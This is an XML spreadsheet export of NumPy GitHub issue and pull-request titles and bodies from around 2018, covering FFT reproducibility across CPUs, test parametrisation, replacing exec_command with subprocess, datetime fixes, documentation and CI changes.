    <t xml:space="preserve">Use of **_np.fft.fftn()_** generates different results depending on what CPU is used to process the same code and inputs.  Practical testing with real images results in scientifically significant changes (up to 0.1% in image flux values) to the processed data simply due to the CPU while running the same executable code, libraries and inputs.  _x000D_
_x000D_
Exhaustive testing has confirmed that all combinations of Python version 3.5, 3.6, and 3.7 and numpy versions 1.11 through 1.15 all generate identical results when run on the same CPU.   Our comparisons were performed with results generated on the following 2 systems:_x000D_
_x000D_
1. System 1:  Linux RHEL7.4, Intel(R) Xeon(R) CPU E5-1660 v4 @ 3.20GHz_x000D_
2. System 2:  Linux RHEL7.5, Intel(R) Xeon(R) CPU E7-8867 v4 @ 2.40GHz_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
The function can be run on different CPUs to demonstrate the different results.  _x000D_
```_x000D_
#!/usr/bin/env python_x000D_
import numpy as np_x000D_
_x000D_
def test_sine_fftn(N=1):_x000D_
    """Odd values of N &gt; 4 will begin to show differences, with differences from 0 growing as N grows"""_x000D_
    rt2 = np.sqrt(2) / 2_x000D_
    x = np.array([0, rt2, 1, rt2, 0, -rt2, -1, -rt2] * N)_x000D_
    return np.fft.fftn(x)_x000D_
_x000D_
if __name__ == '__main__':_x000D_
    print(test_sine_fftn())_x000D_
```_x000D_
_x000D_
This function should return all zeros except for a value which is 1/2 the number of elements in the input array. As a result, it not only reproduces different results on different CPUs, but also illustrates the level of floating-point differences created by the short-cuts used by the underlying instructions.  _x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
Initial testing performed using:_x000D_
1.15.1 3.6.6 |Anaconda, Inc.| (default, Jun 28 2018, 17:14:51) _x000D_
[GCC 7.2.0]_x000D_
</t>
  </si>
  <si>
    <t>FFTN generates different results on different CPUs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!--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Found some missing coverage while working on #11921. Uncovered #11923._x000D_
</t>
  </si>
  <si>
    <t>TST: Add tests for maximum_sctype</t>
  </si>
  <si>
    <t xml:space="preserve">The following code produces the same output (on 64-bit windows, python 3) before and after this change:_x000D_
_x000D_
```python_x000D_
In [4]: {_x000D_
   ...:     name: np.core.numerictypes.bitname(info.type)_x000D_
   ...:     for name, info in sorted(np.core.numerictypes._concrete_typeinfo.items())_x000D_
   ...: }_x000D_
Out[4]:_x000D_
{'bool': ('bool', 8, 'b1'),_x000D_
 'byte': ('int', 8, 'i1'),_x000D_
 'cdouble': ('complex', 128, 'c16'),_x000D_
 'cfloat': ('complex', 64, 'c8'),_x000D_
 'clongdouble': ('complex', 128, 'c16'),_x000D_
 'datetime': ('datetime', 64, 'M8'),_x000D_
 'double': ('float', 64, 'f8'),_x000D_
 'float': ('float', 32, 'f4'),_x000D_
 'half': ('float', 16, 'f2'),_x000D_
 'int': ('int', 32, 'i4'),_x000D_
 'intp': ('int', 64, 'i8'),_x000D_
 'long': ('int', 32, 'i4'),_x000D_
 'longdouble': ('float', 64, 'f8'),_x000D_
 'longlong': ('int', 64, 'i8'),_x000D_
 'object': ('object', 0, 'O'),_x000D_
 'short': ('int', 16, 'i2'),_x000D_
 'string': ('bytes', 0, 'S'),_x000D_
 'timedelta': ('timedelta', 64, 'm8'),_x000D_
 'ubyte': ('uint', 8, 'u1'),_x000D_
 'uint': ('uint', 32, 'u4'),_x000D_
 'uintp': ('uint', 64, 'u8'),_x000D_
 'ulong': ('uint', 32, 'u4'),_x000D_
 'ulonglong': ('uint', 64, 'u8'),_x000D_
 'unicode': ('str', 0, 'U'),_x000D_
 'ushort': ('uint', 16, 'u2'),_x000D_
 'void': ('void', 0, 'V')}_x000D_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_x000D_
This blocks changing the name of `np.longdouble` in #10151 </t>
  </si>
  <si>
    <t>MAINT: Don't rely on `__name__` in bitname - use the information directly from the typeinfo.</t>
  </si>
  <si>
    <t>TST: Fix 'def' test_numerictypes.py::TestSctypeDict to 'class' to enable the test</t>
  </si>
  <si>
    <t>The third part of [NEP 15](http://www.numpy.org/neps/nep-0015-merge-multiarray-umath.html#proposed-changes). Deprecate `np.set_numeric_ops`, `PyArray_SetNumericOps`, `PyArray_GetNumericOps`._x000D_
_x000D_
The second part, "we should use some new, private API to set up `ndarray.__add__` and friends" is still TBD.</t>
  </si>
  <si>
    <t>DEP: deprecate np.set_numeric_ops and friends</t>
  </si>
  <si>
    <t>The shippable team noted that although the pool of nodes is shared, once allocated for a job the node is exclusively assigned so we can use all the cores--trying to bump up usage here--will remove WIP tag if it helps._x000D_
_x000D_
I ran "lscpu" a week or two ago in one of the jobs and the number was quite large -- can't remember how much of that is physical vs. logical, but worth trying to bump up. I think previous small number testing suggested that it can help for testing more than building, but let's see.</t>
  </si>
  <si>
    <t>WIP, TST: bump up CPU usage on shippable nodes</t>
  </si>
  <si>
    <t xml:space="preserve">~Closes &lt;!-- --&gt; #10966.~_x000D_
_x000D_
Added documentation for return of standard python types on success to avoid confusion between PySequence_GETITEM and PyArray_GETITEM_x000D_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</si>
  <si>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 xml:space="preserve">DOC: Clarify difference between PySequence_GETITEM, PyArray_GETITEM </t>
  </si>
  <si>
    <t>The underlying `PyArray_Descr` struct uses `int` for `itemsize`. Document this limitation.</t>
  </si>
  <si>
    <t xml:space="preserve"> DOC: dtype offset and itemsize is limited by range of C int</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: Documentation', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t>In looking at `flake8 --select F811` local variable reuse, I stumbled across the solution in PR #10621 to the problem of recursive closures (#10620). It seems we can avoid assigning the closure to None by using the design pattern in the [last comment](https://github.com/numpy/numpy/pull/10621#issuecomment-366617500) to that PR. _x000D_
_x000D_
I also added a test for the use of recursive closures in `loadtxt`, which exposed another place where we still had cyclical references.</t>
  </si>
  <si>
    <t>MAINT: test, refactor design of recursive closures</t>
  </si>
  <si>
    <t>['01 - Enhancement', '03 - Maintenance', 'component: numpy.core', 'component: numpy.ma']</t>
  </si>
  <si>
    <t>running _x000D_
```_x000D_
flake8 --select F811 `find numpy -name "*.py"`_x000D_
```_x000D_
produced a number of places where we duplicate imports and variable names</t>
  </si>
  <si>
    <t>MAINT: flake8 cleanups</t>
  </si>
  <si>
    <t>Link to specific section on docstrings</t>
  </si>
  <si>
    <t>Link HOWTO_DOCUMENT to specific section on docstrings</t>
  </si>
  <si>
    <t xml:space="preserve">Now opening a PR to NumPy itself for this configuration since stuff will probably go wrong &amp; useful to see that. @jjhelmus provided crucial feedback / help in getting things working better._x000D_
_x000D_
### Justification_x000D_
CI for more exotic platforms is [on our roadmap](https://www.numpy.org/neps/roadmap.html#continuous-integration), the ARMv8 shippable CI service is free for basic tier, and the [linked progress issue](https://github.com/numpy/numpy/issues/11702) &amp; [mailing list discussion](http://numpy-discussion.10968.n7.nabble.com/ARMv8-shippable-addition-to-CI-td46184.html) are so far in favor of adding the ARMv8 testing. The [latest build](https://app.shippable.com/github/tylerjereddy/numpy/runs/115/summary/console) passed in 9 minutes after fresh rebase on latest master._x000D_
_x000D_
### Points Against_x000D_
So far there haven't been any major objections to doing this, but one core dev did note that we may prefer to [set up nightly builds](http://blog.shippable.com/setup-nightly-builds-on-shippable) instead of building on each PR -- I'll leave that decision up to the core team / community. It is a bit more work / config, but happy to handle that if it is the direction decided. May also depend on reliability factors for the new service._x000D_
_x000D_
### Interaction with GitHub_x000D_
I apparently do have permissions to activate the integration with GitHub, but only an owner will be able to turn it off (what could possibly go wrong...). So, I've clicked that button and can't un-click it. Anyway, the initial seeding of the runs always confuses me--the `.yml` confining builds to master branch is in this PR, but I'm not sure if the initial PR to master will allow us to preview the PR integration with no `yml` in master itself -- I guess we'll find out..._x000D_
</t>
  </si>
  <si>
    <t>TST: add shippable ARMv8 to CI</t>
  </si>
  <si>
    <t>C99 looks to work with gcc for all the Python versions we currently_x000D_
support. Testing with c99 is a step forward in testing #11888 before_x000D_
it gets merged after we drop Python 2.7 support._x000D_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t>
  </si>
  <si>
    <t>TST: Start testing with "-std=c99" on travisCI.</t>
  </si>
  <si>
    <t>['01 - Enhancement', '05 - Testing', '27 - Py3K']</t>
  </si>
  <si>
    <t xml:space="preserve">Pytest &lt; 3.8 ignored warnings issued during test collection, but that_x000D_
changed in pytest 3.8 and the method NumPy used to suppress the_x000D_
PendingDeprecationWarning for matrices no longer worked, or rather, was_x000D_
exposed as not working. The fix here is to suppress the warning in_x000D_
pytest.ini and pytesttester.py , which should work as long as the tests_x000D_
are the only places left where NumPy uses matrices._x000D_
_x000D_
An alternate fix is to delay the construction of matrices in the tests_x000D_
until they are actually run, which has the virtue of test localization_x000D_
but is a bit more complicated._x000D_
_x000D_
See https://github.com/pytest-dev/pytest/issues/3945 for discussion._x000D_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</si>
  <si>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matrix PendingDeprecationWarning suppression for pytest 3.8+.</t>
  </si>
  <si>
    <t xml:space="preserve">Related to #11824._x000D_
</t>
  </si>
  <si>
    <t>MAINT: remove exec_command usage in ibm.py</t>
  </si>
  <si>
    <t xml:space="preserve">Related to #11824 </t>
  </si>
  <si>
    <t>MAINT: remove exec_command from gnu.py</t>
  </si>
  <si>
    <t>Related to #11824</t>
  </si>
  <si>
    <t>MAINT: remove exec_command from system_info.py</t>
  </si>
  <si>
    <t>Related to #11824._x000D_
_x000D_
An interesting side effect of this branch -- NumPy builds actually properly use my terminal color scheme on mac--so warnings and underlines from compiler are properly highlighted (just all-grey on master)._x000D_
_x000D_
A few other notes here:_x000D_
_x000D_
- there's partial coverage by tests according to codecov_x000D_
- had to reconstitute some of the string processing from exec_command after check_output; NumPy fails to build otherwise</t>
  </si>
  <si>
    <t>MAINT: remove exec_command usage from ccompiler.py</t>
  </si>
  <si>
    <t>When code does:_x000D_
```python_x000D_
def test():_x000D_
    def check(dtype):_x000D_
        # code_x000D_
    for dtype in [types]:_x000D_
        check(dtype)_x000D_
```_x000D_
replace it with:_x000D_
```python_x000D_
@pytest.mark.parametrize('dtype', [types])_x000D_
def test(dtype):_x000D_
    # code_x000D_
```_x000D_
The test count should go up by 24 now ((4 each - 1) * 8).</t>
  </si>
  <si>
    <t>TST: Parametrize some linalg tests over types.</t>
  </si>
  <si>
    <t>A straight swap of:_x000D_
```python_x000D_
def test(...):_x000D_
    for name in ...:_x000D_
        ..._x000D_
```_x000D_
with_x000D_
```python_x000D_
@pytest.mark.parametrize('name', ...)_x000D_
def test(..., name):_x000D_
    ..._x000D_
```_x000D_
_x000D_
By my count, the test count should go up by 79, which it appears to do._x000D_
_x000D_
I would also like to do something about `numpy/f2py/tests/test_array_from_pyobj.py` so that it doesn't have to use `eval`, but that seems a bit more involved.</t>
  </si>
  <si>
    <t>TST: Parametrize f2py tests.</t>
  </si>
  <si>
    <t>This enables seeing results for all dtypes even if one fails._x000D_
_x000D_
See for example https://github.com/numpy/numpy/issues/11832#issuecomment-418952863.</t>
  </si>
  <si>
    <t>TST: Parametrize PEP3118 scalar tests.</t>
  </si>
  <si>
    <t>Replace a single usage of `exec_command()` with a standard library `subprocess` usage--eventual goal is to completely remove `exec_command()` in favor of the standard library, but working in small / manageable chunks._x000D_
_x000D_
I'm slightly concerned to see that codecov shows the affected code block here as not covered--perhaps this is because we don't run / aggregate coverage results form Appveyor, but we certainly could (*should I do that?*)--I suspect this may cause the coverage diff to fail here even if everything else is green._x000D_
_x000D_
Or that code block may genuinely not be covered by tests I suppose.</t>
  </si>
  <si>
    <t>MAINT: remove exec_command() from build_ext</t>
  </si>
  <si>
    <t xml:space="preserve">SortWorst houses the worst-case setup code and the time_sort_worst method._x000D_
Everything else remains in Sort._x000D_
Done in response to issue #11875_x000D_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</si>
  <si>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BENCH: Split bench_function_base.Sort into Sort and SortWorst.</t>
  </si>
  <si>
    <t xml:space="preserve">This pull request was opened at the request of @matthew-brett and is related to issues #11885, #11886 and #10625._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ENH: Add pocketfft sources to numpy for testing, benchmarks, etc.</t>
  </si>
  <si>
    <t>['01 - Enhancement', '27 - Py3K', 'component: numpy.fft']</t>
  </si>
  <si>
    <t xml:space="preserve">If there is interest, I could provide an FFT library implemented in C99 that is based on fftpack, but falls back to Bluestein's algorithm for near-prime lengths. Accuracy should also be better than the original fftpack._x000D_
_x000D_
You can have a look at the code at https://gitlab.mpcdf.mpg.de/mtr/pocketfft_x000D_
_x000D_
I can contribute this under the 3-clause BSD license, but I haven't added the necessary file headers yet._x000D_
</t>
  </si>
  <si>
    <t>Is there interest in an alternative FFT implementation supporting Bluestein's algorithm for near-prime sizes?</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.fft']</t>
  </si>
  <si>
    <t xml:space="preserve">Brought on by #4701_x000D_
</t>
  </si>
  <si>
    <t>DOC: Recommend the use of `np.ndim` over `np.isscalar`, and explain the differences</t>
  </si>
  <si>
    <t xml:space="preserve">BUG: The multiarray/ufunc merge broke old wheels._x000D_
_x000D_
The numpy/core/umath.py compatibility module was missing the_x000D_
`_UFUNC_API` attribute that needed to be imported from_x000D_
`_multiarray_umath`._x000D_
_x000D_
* Add the `_UFUNC_API` attribute_x000D_
* Make some style fixups._x000D_
_x000D_
See https://github.com/scipy/scipy/issues/9220 for discussion._x000D_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</si>
  <si>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The multiarray/ufunc merge broke old wheels.</t>
  </si>
  <si>
    <t xml:space="preserve">Make sure to Py_DECREF the Py_ArrayDesc created in the definition of_x000D_
SWIG_CanCastAsInteger for long and unsigned long._x000D_
_x000D_
Fixes #11876_x000D_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</si>
  <si>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memory leak in pyfragments.swg</t>
  </si>
  <si>
    <t>WIP: experiment with appveyor.</t>
  </si>
  <si>
    <t>lots of stuff was missing ....</t>
  </si>
  <si>
    <t>MAINT: include benchmarks, complete docs, dev tool files in sdist.</t>
  </si>
  <si>
    <t xml:space="preserve">TST: Drop Python 3.4 testing_x000D_
_x000D_
* Drop Python 3.4 testing on travis and appveyor._x000D_
* Move the DEBUG build to 3.5._x000D_
* Document dropping 3.4 support in the release notes._x000D_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</si>
  <si>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Drop Python 3.4 testing</t>
  </si>
  <si>
    <t>Discussed and accepted in this thread:_x000D_
https://mail.python.org/pipermail/numpy-discussion/2018-July/078476.html_x000D_
_x000D_
Will be linked from https://scipy.org/codes-of-conduct.html and from the_x000D_
GitHub community profile (https://github.com/numpy/numpy/community)</t>
  </si>
  <si>
    <t>DOC: add a Code of Conduct document.</t>
  </si>
  <si>
    <t xml:space="preserve">The virtualenv version was pinned to 14.0.6, which seems to have started_x000D_
causing test failures on Python 2.7 for some unknown reason. The lastest_x000D_
version is 16.0.0 and that seems to fix the problem._x000D_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</si>
  <si>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Update travis testing to use latest virtualenv.</t>
  </si>
  <si>
    <t>#10915 forgot to ensure `numpy.core.umath._ones_like` remained accessible, causing astropy tests to fail (see https://github.com/astropy/astropy/issues/7791). While it is not clear we actually need the function, I think that should be a separate discussion, so  this puts it back for now.</t>
  </si>
  <si>
    <t>BUG: Re-add `_ones_like` to numpy.core.umath.</t>
  </si>
  <si>
    <t>WIP: Empty commit for ci testing</t>
  </si>
  <si>
    <t>This commit fixes #5645 in `python3`, since we don't need to use `123L` syntax for integers anymore. It affects _only_ cases with `L` types and _only_ when there's a comma inside the `dtype` string._x000D_
_x000D_
At the same time, this will break backward compatibility with `python2`, since at least in theory one may want to use something like `np.dtype('d, (2,3L)L')` in `python2`. So we need to decide whether we need this right now, or we will wait until the support of `python2` is dropped._x000D_
_x000D_
The solution is shipped with parametrized tests for all types' pairs.</t>
  </si>
  <si>
    <t>BUG: test and fix np.dtype('i,L') #5645</t>
  </si>
  <si>
    <t>['00 - Bug', '27 - Py3K', 'component: numpy.core']</t>
  </si>
  <si>
    <t>This PR adds docstrings for `np.float16`, `np.uint8`, `np.uint16`, `np.uint32`, `np.uint64`. Furthermore, the formatting of the char codes in the existing docstrings is unified to the same format._x000D_
_x000D_
Where to generate the autosummary in sphinx, adding it to the reference documentation is not completely clear, though: the current documentation on dtypes is spread out over 2 or 3 different places:_x000D_
- https://docs.scipy.org/doc/numpy/reference/arrays.scalars.html_x000D_
- https://docs.scipy.org/doc/numpy/reference/arrays.dtypes.html_x000D_
- https://docs.scipy.org/doc/numpy/user/basics.types.html_x000D_
_x000D_
See #10106._x000D_
_x000D_
(Part of EuroSciPy 2018 sprints)</t>
  </si>
  <si>
    <t>DOC: add docstrings for numeric types</t>
  </si>
  <si>
    <t xml:space="preserve">Passing a scalar value to np.asscalar now returns the scalar instead of_x000D_
raising an AttributeError. See #4701._x000D_
_x000D_
(Part of EuroScipPy 2018 Sprints)_x000D_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</si>
  <si>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np.asscalar passes through scalars</t>
  </si>
  <si>
    <t xml:space="preserve">Tried this at the EuroScipy2018 sprints._x000D_
_x000D_
Running `python runtests.py` on Windows 7 with ananconda, some tests involving complex64 fail. Specifically_x000D_
```_x000D_
 "numpy/core/tests/test_umath.py::TestComplexFunctions::()::test_branch_cuts",_x000D_
 "numpy/core/tests/test_umath.py::TestComplexFunctions::()::test_branch_cuts_complex64",_x000D_
 "numpy/core/tests/test_umath.py::TestComplexFunctions::()::test_loss_of_precision",_x000D_
```_x000D_
_x000D_
Here is one of the failures:_x000D_
```_x000D_
_________________ TestComplexFunctions.test_loss_of_precision __________________x000D_
_x000D_
self = &lt;numpy.core.tests.test_umath.TestComplexFunctions object at 0x000000000ADC6C88&gt;_x000D_
_x000D_
    def test_loss_of_precision(self):_x000D_
        for dtype in [np.complex64, np.complex_]:_x000D_
&gt;           self.check_loss_of_precision(dtype)_x000D_
_x000D_
dtype      = &lt;class 'numpy.complex64'&gt;_x000D_
self       = &lt;numpy.core.tests.test_umath.TestComplexFunctions object at 0x000000000ADC6C88&gt;_x000D_
_x000D_
numpy\core\tests\test_umath.py:2637:_x000D_
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __x000D_
_x000D_
self = &lt;numpy.core.tests.test_umath.TestComplexFunctions object at 0x000000000ADC6C88&gt;_x000D_
dtype = &lt;class 'numpy.complex64'&gt;_x000D_
_x000D_
    def check_loss_of_precision(self, dtype):_x000D_
        """Check loss of precision in complex arc* functions"""_x000D_
_x000D_
        # Check against known-good functions_x000D_
_x000D_
        info = np.finfo(dtype)_x000D_
        real_dtype = dtype(0.).real.dtype_x000D_
        eps = info.eps_x000D_
_x000D_
        def check(x, rtol):_x000D_
            x = x.astype(real_dtype)_x000D_
_x000D_
            z = x.astype(dtype)_x000D_
            d = np.absolute(np.arcsinh(x)/np.arcsinh(z).real - 1)_x000D_
            assert_(np.all(d &lt; rtol), (np.argmax(d), x[np.argmax(d)], d.max(),_x000D_
                                      'arcsinh'))_x000D_
_x000D_
            z = (1j*x).astype(dtype)_x000D_
            d = np.absolute(np.arcsinh(x)/np.arcsin(z).imag - 1)_x000D_
            assert_(np.all(d &lt; rtol), (np.argmax(d), x[np.argmax(d)], d.max(),_x000D_
                                      'arcsin'))_x000D_
_x000D_
            z = x.astype(dtype)_x000D_
            d = np.absolute(np.arctanh(x)/np.arctanh(z).real - 1)_x000D_
            assert_(np.all(d &lt; rtol), (np.argmax(d), x[np.argmax(d)], d.max(),_x000D_
                                      'arctanh'))_x000D_
_x000D_
            z = (1j*x).astype(dtype)_x000D_
            d = np.absolute(np.arctanh(x)/np.arctan(z).imag - 1)_x000D_
            assert_(np.all(d &lt; rtol), (np.argmax(d), x[np.argmax(d)], d.max(),_x000D_
                                      'arctan'))_x000D_
_x000D_
        # The switchover was chosen as 1e-3; hence there can be up to_x000D_
        # ~eps/1e-3 of relative cancellation error before it_x000D_
_x000D_
        x_series = np.logspace(-20, -3.001, 200)_x000D_
        x_basic = np.logspace(-2.999, 0, 10, endpoint=False)_x000D_
_x000D_
        if dtype is np.longcomplex:_x000D_
            # It's not guaranteed that the system-provided arc functions_x000D_
            # are accurate down to a few epsilons. (Eg. on Linux 64-bit)_x000D_
            # So, give more leeway for long complex tests here:_x000D_
            check(x_series, 50*eps)_x000D_
        else:_x000D_
            check(x_series, 2.1*eps)_x000D_
        check(x_basic, 2*eps/1e-3)_x000D_
_x000D_
        # Check a few points_x000D_
_x000D_
        z = np.array([1e-5*(1+1j)], dtype=dtype)_x000D_
        p = 9.999999999333333333e-6 + 1.000000000066666666e-5j_x000D_
        d = np.absolute(1-np.arctanh(z)/p)_x000D_
&gt;       assert_(np.all(d &lt; 1e-15))_x000D_
E       AssertionError_x000D_
_x000D_
check      = &lt;function TestComplexFunctions.check_loss_of_precision.&lt;locals&gt;.check at 0x000000000AEAF8C8&gt;_x000D_
d          = array([4.5474735e-08], dtype=float32)_x000D_
dtype      = &lt;class 'numpy.complex64'&gt;_x000D_
eps        = 1.1920929e-07_x000D_
info       = finfo(resolution=1e-06, min=-3.4028235e+38, max=3.4028235e+38, dtype=float32)_x000D_
p          = (9.999999999333333e-06+1.0000000000666667e-05j)_x000D_
real_dtype = dtype('float32')_x000D_
self       = &lt;numpy.core.tests.test_umath.TestComplexFunctions object at 0x000000000ADC6C88&gt;_x000D_
x_basic    = array([0.00100231, 0.0019994 , 0.00398841, 0.0079561 , 0.01587084,_x000D_
       0.0316592 , 0.06315387, 0.12597953, 0.25130435, 0.50130265])_x000D_
x_series   = array([1.00000000e-20, 1.21736864e-20, 1.48198641e-20, 1.80412378e-20,_x000D_
       2.19628372e-20, 2.67368693e-20, 3.254862...3.06526013e-04, 3.73155156e-04, 4.54267386e-04,_x000D_
       5.53010871e-04, 6.73218092e-04, 8.19554595e-04, 9.97700064e-04])_x000D_
z          = array([1.e-05+1.e-05j], dtype=complex64)_x000D_
_x000D_
numpy\core\tests\test_umath.py:2602: AssertionError_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
This is from latest HEAD of NumPy, python version _x000D_
```_x000D_
Python 3.6.3 |Anaconda custom (64-bit)| (default, Oct 15 2017, 03:27:45)_x000D_
 [MSC v.1900 64 bit (AMD64)] on win32_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>BUG: Compiling with MSVC 14.12.25827 with no openblas fails tests</t>
  </si>
  <si>
    <t>Fixes #7617_x000D_
_x000D_
I should (probably) add more tests &amp; maybe account for the duplication logic (another branch of the C function adjusted here uses that block too) by abstracting to a "helper" function.</t>
  </si>
  <si>
    <t>BUG: timedelta64 now accepts NumPy ints</t>
  </si>
  <si>
    <t>Fixes #8780 _x000D_
_x000D_
`np.nan` can now be assigned into `np.datetime64` generic and unit-specific arrays and will be cast to `np.datetime64('NaT')`._x000D_
_x000D_
I haven't yet changed the result of `np.can_cast()` for this scenario though--perhaps feedback would be useful before altering that behavior as well._x000D_
_x000D_
There's probably a more elegant way to draft the unit test.</t>
  </si>
  <si>
    <t>ENH: allow nan -&gt; NaT casting</t>
  </si>
  <si>
    <t xml:space="preserve">closes #11845 </t>
  </si>
  <si>
    <t>DOC: add comment to remove fn after python 2 support is dropped</t>
  </si>
  <si>
    <t>Fixes #11790_x000D_
_x000D_
`mem_overlap.c` was being recompiled to build a C test extension after `mem_overlap.c` was already compiled by the C extension it is testing. This PR switches the order of compilation--build the test extension first, and then the library, so that `gcov` runs on source files that match the building of the library files, not the files that are testing them._x000D_
_x000D_
A better design might eventually avoid requiring the diophantine code from `mem_overlap` to be used in the test file itself--i.e., find a way to probe the code paths in the library without reusing that dependency.</t>
  </si>
  <si>
    <t>TST: reorder duplicate mem_overlap.c compile</t>
  </si>
  <si>
    <t>Hi, i following the tutorial by denny britz [here](http://www.wildml.com/2015/10/recurrent-neural-network-tutorial-part-4-implementing-a-grulstm-rnn-with-python-and-theano/), and i got some problem of `np.random.multinomial(1, next_word_probs)`_x000D_
_x000D_
here's my related code_x000D_
_x000D_
```_x000D_
def generate_sentence(model, index_to_word, word_to_index, min_length=5):_x000D_
    # We start the sentence with the start token_x000D_
    new_sentence = [word_to_index[SENTENCE_START_TOKEN], word_to_index[white], word_to_index[plane]]_x000D_
    # Repeat until we get an end token_x000D_
    while not new_sentence[-1] == word_to_index[SENTENCE_END_TOKEN]:_x000D_
            next_word_probs = model.predict(new_sentence)[-1]_x000D_
            samples = np.random.multinomial(1, next_word_probs)_x000D_
            sampled_word = np.argmax(samples)_x000D_
            new_sentence.append(sampled_word)_x000D_
            # Seomtimes we get stuck if the sentence becomes too long, e.g. "........" :(_x000D_
            # And: We don't want sentences with UNKNOWN_TOKEN's_x000D_
            if len(new_sentence) &gt; 100 or sampled_word == word_to_index[UNKNOWN_TOKEN]:_x000D_
                return None_x000D_
    if len(new_sentence) &lt; min_length:_x000D_
        return None_x000D_
    return new_sentence_x000D_
```_x000D_
and here is the output error message_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
_x000D_
  File "&lt;ipython-input-13-5282294d5250&gt;", line 1, in &lt;module&gt;_x000D_
    runfile('C:/Users/cerdas/Documents/bil/lat/rnn-tutorial-gru-lstm-master/train.py', wdir='C:/Users/cerdas/Documents/bil/lat/rnn-tutorial-gru-lstm-master')_x000D_
_x000D_
  File "C:\Users\cerdas\Anaconda3\lib\site-packages\spyder\utils\site\sitecustomize.py", line 705, in runfile_x000D_
    execfile(filename, namespace)_x000D_
_x000D_
  File "C:\Users\cerdas\Anaconda3\lib\site-packages\spyder\utils\site\sitecustomize.py", line 102, in execfile_x000D_
    exec(compile(f.read(), filename, 'exec'), namespace)_x000D_
_x000D_
  File "C:/Users/cerdas/Documents/bil/lat/rnn-tutorial-gru-lstm-master/train.py", line 53, in &lt;module&gt;_x000D_
    generate_sentences(model, 10, index_to_word, word_to_index)_x000D_
_x000D_
  File "C:\Users\cerdas\Documents\bil\lat\rnn-tutorial-gru-lstm-master\utils.py", line 189, in generate_sentences_x000D_
    sent = generate_sentence(model, index_to_word, word_to_index)_x000D_
_x000D_
  File "C:\Users\cerdas\Documents\bil\lat\rnn-tutorial-gru-lstm-master\utils.py", line 166, in generate_sentence_x000D_
    samples = np.random.multinomial(1, next_word_probs)_x000D_
_x000D_
  File "mtrand.pyx", line 4630, in mtrand.RandomState.multinomial_x000D_
_x000D_
ValueError: sum(pvals[:-1]) &gt; 1.0`_x000D_
_x000D_
I have searching for the similar issue, i suspect there is the problem of `np.random.multinomial_x000D_
```_x000D_
i found the suspected problem by the answer_x000D_
_x000D_
&gt; The root of this problem rises from numpy's implicit data casting: the output of my sorfmax() is in float32 type, however, numpy.random.multinomial() will cast the pval into float64 type IMPLICITLY. This data type casting would cause pval.sum() exceed 1.0 sometimes due to numerical rounding._x000D_
_x000D_
but i still have no idea how to solve the problem</t>
  </si>
  <si>
    <t>ValueError: sum(pvals[:-1]) &gt; 1.0</t>
  </si>
  <si>
    <t>Issue #11842 _x000D_
_x000D_
This variable is never used, and shows signs of being leftover from a previous implementation.</t>
  </si>
  <si>
    <t>MAINT: remove surviving, unused, list comprehension</t>
  </si>
  <si>
    <t>Lines 320 to 325 of `numpy/polynomial/_polybase.py` contains the following code:_x000D_
_x000D_
```_x000D_
        # filter out uninteresting coefficients_x000D_
        filtered_coeffs = [_x000D_
            (i, c)_x000D_
            for i, c in enumerate(self.coef)_x000D_
            # if not (c == 0)  # handle NaN_x000D_
        ]_x000D_
```_x000D_
_x000D_
A few things to note:_x000D_
1) the comment no longer describes what the comprehension does_x000D_
2) the conditional is commented out_x000D_
3) resulting list is never used_x000D_
_x000D_
Looks like this is just some leftover code from a prior implementation that has caused no problems, as so has been overlooked.</t>
  </si>
  <si>
    <t>MAINT: Remove surviving and unused list comprehension from _polybase</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #11752._x000D_
_x000D_
Some discussion may be needed since `git bisect` didn't reveal a commit where one of Eric's cases didn't raise an `Exception` of some sort._x000D_
_x000D_
For example, with the changes here, instead of `repr` crashing we get `NaT` as filler:_x000D_
```Python_x000D_
repr(np.zeros(2, np.datetime64))_x000D_
# "array(['NaT', 'NaT'], dtype=datetime64)"_x000D_
```_x000D_
_x000D_
As a reference:_x000D_
```Python_x000D_
repr(np.zeros(2, 'datetime64[M]'))_x000D_
# "array(['1970-01', '1970-01'], dtype='datetime64[M]')"_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>BUG: fix repr for generic datetime</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #11151._x000D_
_x000D_
It is now possible to convert 0 dimensional `datetime.timedelta` NumPy object arrays to `np.timedelta64` 0 dimensional NumPy arrays. _x000D_
_x000D_
The linked issue does not specify other 0 dimensional NumPy object array-related datetime issues so this patch initially aims only to fix that specific reported scenario, but I've added a comment in the C source suggesting that other 0 dimensional object array type checks / handling might be needed in the future._x000D_
</t>
  </si>
  <si>
    <t>BUG: Let 0-D arrays of Python timedelta convert to np.timedelta64.</t>
  </si>
  <si>
    <t>I have two sets of 3D vectors, each 500x1000 in size. I want to take their inner products, but numpy crashes with `MemoryError`._x000D_
_x000D_
Can you somehow fix it?_x000D_
_x000D_
```_x000D_
import numpy as np_x000D_
a_vecs = np.zeros((500, 1000, 3), dtype=np.float64)_x000D_
b_vecs = np.zeros((500, 1000, 3), dtype=np.float64)_x000D_
scalars = np.inner(a_vecs, b_vecs)_x000D_
```_x000D_
MemoryError = (_x000D_
_x000D_
OS: Windows 7x64_x000D_
Python: 3.6x64_x000D_
numpy: '1.14.2'</t>
  </si>
  <si>
    <t>np.inner crashes with MemoryError on moderate-sized arrays</t>
  </si>
  <si>
    <t xml:space="preserve">I have problems to install numpy version 1.15.1 for Python 3.6 on 64-bit Windows. _x000D_
_x000D_
I tried first with "pip install" which was aborted due to mismatch of hashes. I also tried to manually download the wheel [numpy-1.15.1-cp36-none-win_amd64.whl](url) from[https://pypi.org/project/numpy/1.15.1/#files](url) but that was also automatically aborted._x000D_
_x000D_
Could there be something wrong with the wheel itself?_x000D_
 _x000D_
### Reproducing code example:_x000D_
